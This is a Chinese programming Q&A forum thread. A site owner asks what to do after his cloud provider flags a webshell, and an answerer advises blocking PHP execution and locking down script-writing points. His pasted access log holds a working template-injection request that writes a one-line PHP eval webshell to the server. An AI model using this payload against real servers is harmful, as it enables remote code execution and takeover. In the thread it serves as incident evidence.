首页新闻找找看学习计划

服务器有webshell 脚本怎么办?

0
悬赏园豆:15 [已解决问题] 解决于 2019-12-24 18:43

昨天阿里云 提示发现了webshell 脚本,然后根据他的日志文件发现,好像是破解我以前玩的.net 项目,我承认这个项目很烂,当时只是为了绑定域名玩一玩,没想到会出事,后来,我就把这个项目删了,具体什么时候删了,我也不太记得了...

昨天晚上
发现这段代码
a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php%20@eval($_POST[hm]);?>hmseo')</php> 8001 - 172.17.85.92 Mozilla/4.0+(compatible;+MSIE+9.0;+Windows+NT+6.1) https://blog.cgrain.top/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('hmseo.php','<?php+@eval($_POST[hm]);?>hmseo')</php> 200 0 0 94

windows 日志 是 XXX191114.log 这过了这么久,然后我查看了最近的日志,发现这大哥还在弄我网站 大概是每天凌晨左右。。。 我要怎么测,才能看看我的网站或者我的代码,服务器有没有给入侵???

学艺不精,求大哥帮忙
现在网站我也从新弄了。。
https://www.cgrain.top/ 能否有大哥 这网站还有没有其它漏洞?

Cgrain的主页 Cgrain | 小虾三级 | 园豆:726
提问于:2019-12-05 13:54
< >
分享
最佳答案
0

这个按照头疼医头的处理,就是禁止php脚本执行。。。。

收获园豆:15
心雨纷扬 | 菜鸟二级 |园豆:304 | 2019-12-06 14:10

根治的问题,就是各个需要写入、执行脚本操作的地方,严格把控

你这个应该是有个编译模板的东西,然后他把它自己想执行的东西都放进去了你的服务器

心雨纷扬 | 园豆:304 (菜鸟二级) | 2019-12-06 14:12

@心雨纷扬: 主要是我把以前代码给删了,现在这狗日的每天 天天有事没事就来弄我服务器

但是好像这脚本注入不进来的,我这几天监控他ip 看看,永久拉黑他

Cgrain | 园豆:726 (小虾三级) | 2019-12-06 21:04
其他回答(1)
0

Close

Cgrain | 园豆:726 (小虾三级) | 2019-12-06 21:54
清除回答草稿
   您需要登录以后才能回答,未注册用户请先注册